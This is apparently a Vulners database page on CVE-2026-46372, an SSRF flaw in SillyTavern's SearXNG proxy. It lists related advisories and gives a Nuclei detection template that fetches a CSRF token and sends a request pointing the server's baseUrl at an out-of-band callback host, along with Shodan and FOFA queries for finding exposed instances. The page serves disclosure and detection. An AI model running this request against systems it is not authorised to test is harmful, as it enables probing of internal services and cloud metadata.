| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2026-46372 | 29 May 202617:41 | – | attackerkb | |
| CVE-2026-46372 | 20 May 202608:35 | – | circl | |
| SillyTavern 安全漏洞 | 29 May 202600:00 | – | cnnvd | |
| CVE-2026-46372 | 29 May 202617:41 | – | cve | |
| CVE-2026-46372 SillyTavern: SSRF in SearXNG Search Proxy via Unvalidated baseUrl | 29 May 202617:41 | – | cvelist | |
| EUVD-2026-33397 | 29 May 202617:41 | – | euvd | |
| SillyTavern: SSRF in SearXNG Search Proxy via Unvalidated baseUrl | 19 May 202620:09 | – | github | |
| CVE-2026-46372 | 29 May 202619:16 | – | nvd | |
| GHSA-QG89-QWWH-5F3J SillyTavern: SSRF in SearXNG Search Proxy via Unvalidated baseUrl | 19 May 202620:09 | – | osv | |
| NPM: SillyTavern: SSRF in SearXNG Search Proxy via Unvalidated baseUrl | 19 May 202620:09 | – | patchstack |
id: CVE-2026-46372
info:
name: SillyTavern - Server-Side Request Forgery
author: theamanrawat
severity: high
description: |
SillyTavern versions up to and including 1.17.0 expose the /api/search/searxng endpoint, which accepts an attacker-controlled baseUrl parameter and uses it directly to build outbound server-side fetch requests. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the full response body, enabling read access to internal services, cloud metadata endpoints, and private network resources.
remediation:
Upgrade SillyTavern to version 1.18.0 or later, which introduces a Private Request Whitelisting filter. Enable and properly configure the filter when hosting over a network.
reference:
- https://github.com/SillyTavern/SillyTavern/security/advisories/GHSA-qg89-qwwh-5f3j
- https://nvd.nist.gov/vuln/detail/CVE-2026-46372
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
cvss-score: 8.5
cve-id: CVE-2026-46372
epss-score: 0.00866
epss-percentile: 0.54229
cwe-id: CWE-918
metadata:
verified: true
max-request: 3
shodan-query: http.title:"SillyTavern"
fofa-query: title="SillyTavern"
tags: cve,cve2026,sillytavern,nodejs,ssrf,unauthenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "<title>SillyTavern</title>"
internal: true
- raw:
- |
GET /csrf-token HTTP/1.1
Host: {{Hostname}}
- |
POST /api/search/searxng HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-CSRF-Token: {{csrf_token}}
{"baseUrl":"http://{{interactsh-url}}/","query":"x"}
extractors:
- type: json
name: csrf_token
part: body
internal: true
json:
- '.token'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "GET"
# digest: 4a0a00473045022052e324dad82faaf2d0084e323f4989802dd5667ffd6713f5e29a3077aa9a4845022100cc782bed7f863562b6db8ea5a29aaac81c08c223995e915bd2605f1b090ab43e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation